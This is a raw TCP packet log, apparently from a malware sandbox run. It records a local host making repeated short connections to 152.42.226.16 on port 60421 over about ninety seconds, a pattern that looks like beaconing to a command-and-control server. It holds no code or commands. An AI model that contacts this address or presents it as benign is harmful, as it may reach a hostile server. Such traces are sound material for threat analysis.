                      Dec 26, 2024 19:28:19.392421007 CET4971960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:19.497395039 CET6042149715152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:19.512254000 CET6042149719152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:19.512346029 CET4971960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:19.512931108 CET4971960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:19.634193897 CET6042149719152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:22.174305916 CET6042149719152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:22.174391985 CET4971960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.174510002 CET4971960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.183674097 CET4972660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.294095039 CET6042149719152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:22.303177118 CET6042149726152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:22.303266048 CET4972660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.306715012 CET4972660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.426414013 CET6042149726152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:22.426510096 CET4972660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.466690063 CET4972760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.586321115 CET6042149727152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:22.586436987 CET4972760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.586909056 CET4972760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:22.706459999 CET6042149727152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:25.256752968 CET6042149727152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:25.256834984 CET4972760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:25.256952047 CET4972760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:25.268915892 CET4973360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:25.376514912 CET6042149727152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:25.388504028 CET6042149733152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:25.388612032 CET4973360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:25.391753912 CET4973360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:25.511332989 CET6042149733152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:28.049015999 CET6042149733152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:28.049091101 CET4973360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.049235106 CET4973360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.062486887 CET4973960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.168620110 CET6042149733152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:28.182096004 CET6042149739152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:28.182188988 CET4973960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.196320057 CET4973960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.318810940 CET6042149739152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:28.318862915 CET4973960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.441155910 CET4974460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.561819077 CET6042149744152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:28.562032938 CET4974460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.660649061 CET4974460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:28.782835960 CET6042149744152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:31.327090979 CET6042149744152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:31.327153921 CET4974460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:31.339799881 CET4974460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:31.340409040 CET4975160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:31.461458921 CET6042149744152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:31.461844921 CET6042149751152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:31.461921930 CET4975160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:31.462208986 CET4975160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:31.584290028 CET6042149751152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:34.127408981 CET6042149751152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:34.127520084 CET4975160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.127609015 CET4975160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.139086008 CET4975760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.247452974 CET6042149751152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:34.258754015 CET6042149757152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:34.258869886 CET4975760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.259079933 CET4975760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.378881931 CET6042149757152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:34.378983021 CET4975760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.388648033 CET4975860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.508327007 CET6042149758152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:34.508487940 CET4975860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.508991003 CET4975860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:34.628742933 CET6042149758152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:37.157783985 CET6042149758152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:37.157879114 CET4975860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:37.158090115 CET4975860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:37.172003984 CET4976460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:37.277590990 CET6042149758152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:37.291652918 CET6042149764152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:37.291749954 CET4976460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:37.292007923 CET4976460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:37.412550926 CET6042149764152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:40.287497044 CET6042149764152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:40.289122105 CET4976460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:40.289324999 CET4976460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:40.309520960 CET4977060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:40.328843117 CET6042149764152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:40.329296112 CET4976460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:40.410481930 CET6042149764152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:40.429080009 CET6042149770152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:40.429205894 CET4977060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:40.429382086 CET4977060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:40.543706894 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:40.549736977 CET6042149770152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:40.549820900 CET4977060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.095874071 CET6042149770152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:41.095971107 CET4977060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.096677065 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:41.096770048 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.097204924 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.215616941 CET6042149770152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:41.216926098 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.783345938 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.783418894 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.783516884 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.794596910 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.904283047 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.915191889 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.915282965 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.915533066 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:44.034998894 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.657814980 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.657898903 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.657980919 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.670279980 CET4978860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.778021097 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.790309906 CET6042149788152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.790397882 CET4978860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.790539026 CET4978860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.901603937 CET4978960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.911310911 CET6042149788152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.911384106 CET4978860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:47.021225929 CET6042149789152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:47.021320105 CET4978960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:47.021637917 CET4978960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:47.141156912 CET6042149789152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:49.678401947 CET6042149789152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:49.678477049 CET4978960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:49.681016922 CET4978960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:49.695297003 CET4979560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:49.807308912 CET6042149789152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:49.821254969 CET6042149795152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:49.821456909 CET4979560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:49.821918011 CET4979560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:49.941411972 CET6042149795152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:52.502999067 CET6042149795152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:52.503099918 CET4979560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.503199100 CET4979560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.517132998 CET4980160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.622838020 CET6042149795152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:52.636681080 CET6042149801152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:52.636761904 CET4980160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.636987925 CET4980160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.747679949 CET4980260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.765095949 CET6042149801152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:52.780697107 CET6042149801152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:52.780761003 CET4980160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.873581886 CET6042149802152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:52.873667002 CET4980260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.873904943 CET4980260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:52.993422031 CET6042149802152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:55.588433027 CET6042149802152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:55.588584900 CET4980260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:55.588859081 CET4980260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:55.599811077 CET4980960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:55.708345890 CET6042149802152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:55.719846964 CET6042149809152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:55.719944954 CET4980960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:55.727696896 CET4980960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:55.847282887 CET6042149809152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:58.413650990 CET6042149809152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:58.413713932 CET4980960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.414026022 CET4980960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.446155071 CET4982060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.533629894 CET6042149809152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:58.565742016 CET6042149820152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:58.565846920 CET4982060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.566263914 CET4982060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.683249950 CET4982160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.685728073 CET6042149820152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:58.685867071 CET4982060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.802886963 CET6042149821152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:58.802988052 CET4982160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.803368092 CET4982160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:58.922820091 CET6042149821152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:01.456231117 CET6042149821152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:01.456300020 CET4982160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:01.456367970 CET4982160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:01.466264009 CET4982760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:01.576083899 CET6042149821152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:01.586057901 CET6042149827152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:01.586158991 CET4982760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:01.586518049 CET4982760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:01.706151009 CET6042149827152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:04.332998037 CET6042149827152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:04.333264112 CET4982760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.334321022 CET4982760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.348567009 CET4983260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.460576057 CET6042149827152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:04.623224020 CET6042149832152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:04.623331070 CET4983260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.623557091 CET4983260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.732790947 CET4983360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.743403912 CET6042149832152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:04.743464947 CET4983260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.852303028 CET6042149833152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:04.852444887 CET4983360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.852826118 CET4983360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:04.974303961 CET6042149833152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:07.535100937 CET6042149833152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:07.535212994 CET4983360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:07.535296917 CET4983360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:07.548470020 CET4983960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:07.654860020 CET6042149833152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:07.668112993 CET6042149839152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:07.668221951 CET4983960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:07.668601036 CET4983960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:07.796030998 CET6042149839152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:10.698976040 CET6042149839152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:10.699064016 CET4983960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:10.699134111 CET4983960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:10.714951038 CET4984760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:10.761296988 CET6042149839152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:10.761353970 CET4983960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:10.818954945 CET6042149839152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:10.834638119 CET6042149847152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:10.834804058 CET4984760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:10.834919930 CET4984760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:10.950141907 CET4985060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:10.954916954 CET6042149847152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:10.954977036 CET4984760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:11.069736958 CET6042149850152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:11.069802999 CET4985060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:11.070013046 CET4985060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:11.189466000 CET6042149850152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:14.096105099 CET6042149850152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:14.096183062 CET4985060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:14.096313000 CET4985060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:14.117202997 CET4985760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:14.153480053 CET6042149850152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:14.155339003 CET4985060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:14.217070103 CET6042149850152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:14.236833096 CET6042149857152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:14.239420891 CET4985760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:14.240020990 CET4985760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:14.361916065 CET6042149857152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:16.893395901 CET6042149857152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:16.895473957 CET4985760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:16.895546913 CET4985760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:16.917100906 CET4986360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:17.015115976 CET6042149857152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:17.036917925 CET6042149863152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:17.037065029 CET4986360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:17.037156105 CET4986360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:17.153240919 CET4986460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:17.157159090 CET6042149863152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:17.157233953 CET4986360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:17.272953033 CET6042149864152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:17.275511026 CET4986460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:17.275705099 CET4986460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:17.395435095 CET6042149864152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:19.931277990 CET6042149864152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:19.931427956 CET4986460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:19.931576014 CET4986460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:19.952914000 CET4987060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:20.054341078 CET6042149864152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:20.073220968 CET6042149870152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:20.073318005 CET4987060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:20.073757887 CET4987060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:20.193802118 CET6042149870152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:22.951427937 CET6042149870152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:22.951508045 CET4987060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:22.951649904 CET4987060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.020497084 CET4987660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.073555946 CET6042149870152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:23.140069962 CET6042149876152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:23.140217066 CET4987660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.140439034 CET4987660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.261826038 CET6042149876152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:23.262104988 CET6042149876152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:23.262271881 CET4987660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.263803959 CET4987760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.509444952 CET6042149877152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:23.509545088 CET4987760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.510174990 CET4987760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:23.629709959 CET6042149877152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:26.206485987 CET6042149877152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:26.206541061 CET4987760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:26.206902027 CET4987760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:26.259438038 CET4988760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:26.326898098 CET6042149877152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:26.379285097 CET6042149887152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:26.379364967 CET4988760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:26.379717112 CET4988760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:26.499264002 CET6042149887152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:29.034181118 CET6042149887152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:29.035557985 CET4988760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.035557985 CET4988760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.128384113 CET4989360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.155289888 CET6042149887152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:29.248192072 CET6042149893152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:29.248307943 CET4989360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.248562098 CET4989360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.368309021 CET6042149893152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:29.368443966 CET4989360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.372883081 CET4989460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.493824959 CET6042149894152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:29.493911982 CET4989460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.494759083 CET4989460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:29.614294052 CET6042149894152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:32.159181118 CET6042149894152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:32.159250021 CET4989460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:32.159336090 CET4989460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:32.177947044 CET4990160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:32.279381990 CET6042149894152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:32.297908068 CET6042149901152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:32.297982931 CET4990160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:32.298543930 CET4990160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:32.418100119 CET6042149901152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:34.955637932 CET6042149901152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:34.955715895 CET4990160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:34.955822945 CET4990160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:34.988718033 CET4990760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:35.075994015 CET6042149901152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:35.109627962 CET6042149907152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:35.109731913 CET4990760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:35.109956026 CET4990760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:35.229825974 CET6042149907152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:35.229862928 CET6042149907152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:35.231426001 CET4990760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:35.247349024 CET4990860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:35.367284060 CET6042149908152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:35.367367029 CET4990860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:35.371345997 CET4990860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:35.491724014 CET6042149908152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:38.062412977 CET6042149908152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:38.062490940 CET4990860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:38.062582016 CET4990860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:38.080868959 CET4991860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:38.183182955 CET6042149908152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:38.200638056 CET6042149918152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:38.200726986 CET4991860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:38.201335907 CET4991860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:38.320884943 CET6042149918152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:40.879131079 CET6042149918152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:40.879235029 CET4991860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:40.879831076 CET4991860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:40.994002104 CET4992460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:40.999696016 CET6042149918152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:41.114504099 CET6042149924152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:41.115641117 CET4992460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:41.115641117 CET4992460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:41.236409903 CET6042149924152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:41.243356943 CET4992460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:41.297369003 CET4992660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:41.417403936 CET6042149926152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:41.417706966 CET4992660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:41.421375990 CET4992660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:41.541259050 CET6042149926152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:44.081221104 CET6042149926152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:44.081305981 CET4992660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:44.081403017 CET4992660421192.168.2.5152.42.226.16
